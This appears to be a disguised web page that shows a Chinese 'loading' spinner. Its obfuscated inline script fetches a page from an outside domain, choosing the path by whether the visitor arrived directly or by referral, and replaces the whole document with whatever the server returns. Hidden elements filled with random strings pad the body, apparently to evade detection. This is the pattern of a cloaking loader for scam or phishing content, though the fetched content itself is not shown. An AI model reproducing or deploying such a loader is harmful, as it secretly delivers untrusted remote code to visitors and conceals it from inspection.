<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .XdyPl1Zt {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .XdyPl1Zt .OgxUxCi5T {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .XdyPl1Zt .content {
            line-height: 50px;
            text-align: center
        }

        .XdyPl1Zt .img {
            width: 100%
        }

        .XdyPl1Zt .gduNng41F {
            text-align: center
        }

        .XdyPl1Zt .gduNng41F span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .XdyPl1Zt .gduNng41F span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .XdyPl1Zt .gduNng41F span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .XdyPl1Zt .gduNng41F span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .XdyPl1Zt .gduNng41F span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .XdyPl1Zt .gduNng41F span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .XdyPl1Zt .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function BWoW72IjoIJUe(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var UhNkT = BWoW72IjoIJUe('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ UhNkT +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ UhNkT +".html?a=share";
		}
		
        ZhC8Ttp6=url+"#"+new Date().getTime();
        ZhC8Ttp6 && function() {
            $.get(ZhC8Ttp6, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<div style='display:none'>A6sHUZzvMVwEpMi475V7naxW5aoKSAsbWtXL74JHiOm1SFzcogzEgCpOFLyJLdfo5Cf9uOOv6EoEr6Cups3CM</div>
<div style='display:none'>A6sHUZzvMVwEpMi475V7naxW5aoKSAsbWtXL74JHiOm1SFzcogzEgCpOFLyJLdfo5Cf9uOOv6EoEr6Cups3CM</div>
<a  href='#' style='display:none'>SEDlx2WRoWHe7YRsbxDTcIdqgEb0Vt</a>
<b style='display:none' >J62626nXzlIE5cMzW417z7ft8AOLPX9lne7IxLB4gcJKi1MH6nobFWdUD</b>
<div style='display:none'>A6sHUZzvMVwEpMi475V7naxW5aoKSAsbWtXL74JHiOm1SFzcogzEgCpOFLyJLdfo5Cf9uOOv6EoEr6Cups3CM</div>
<ul style='display:none' >OqznKoo7uUYX7IvYT4gnFlrsqG9oTfuByf6PXPf</ul>
<p  style='display:none'>MeDxsnwjKklnimM91dt5fAbDfg8T3zbEa4OEfCfAQaEXxH2BTpU8InDeujhrjtu28dDerbMZUlhv4LQ0gCxt51FEfvMhf1EyIHSh</p>
<b style='display:none' >J62626nXzlIE5cMzW417z7ft8AOLPX9lne7IxLB4gcJKi1MH6nobFWdUD</b>
<span style='display:none'>ezUkbdH6aytzPZYhKNLxwytzhS99MZpfRibl1oGV7nMEF6SVT7vWf9k7wOd8zilApMV4KlEbIy7GEv0L</span><div class="XdyPl1Zt">
    <div class="OgxUxCi5T">
        <div class="gduNng41F">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<h1 style='display:none' >zHbQNCPdEeVMQ32icPVCfAcU</h1>
<b style='display:none' >ZcESH8WR3PT7hxaiu0Kh5x3mvQFVr1PgAvgZPjB3BGmWwA4YewNUqt9k2cwBoWZlPARWrPkNazTgPJ8g</b>
<span style='display:none'>yROkeSUhQ5tKll1dGAPiol9Dzryl1aTPAZ5hAyFyF5zTogcqjxpIxnLlbVqvZbUbcytS5OsL</span>
<ul style='display:none' >n2zGTHNBpccu15deYfS3mLUYhtkp9WUPV5p3DWs2Rnf2wu1OH3qDKBQh1GKiZmDlOxiWqzfBtN7SWTIkSuIL9NM70XeHTyJ</ul>
<li style='display:none' >JM4F18cwkXGEMmGdVGaQlQFxOo6JmnuLfCV1zssEosdzW5GXnm60vDwzqVWZUpg4Zsb</li>
<div style='display:none'>UtVoaAlhCeCrsjA63nVbYVtk1Jk9jXCAbt4v7H1btRVXH2JMcGEoOnOFpKGI7</div>
<h1 style='display:none' >zHbQNCPdEeVMQ32icPVCfAcU</h1>
<span style='display:none'>yROkeSUhQ5tKll1dGAPiol9Dzryl1aTPAZ5hAyFyF5zTogcqjxpIxnLlbVqvZbUbcytS5OsL</span></body>
</html>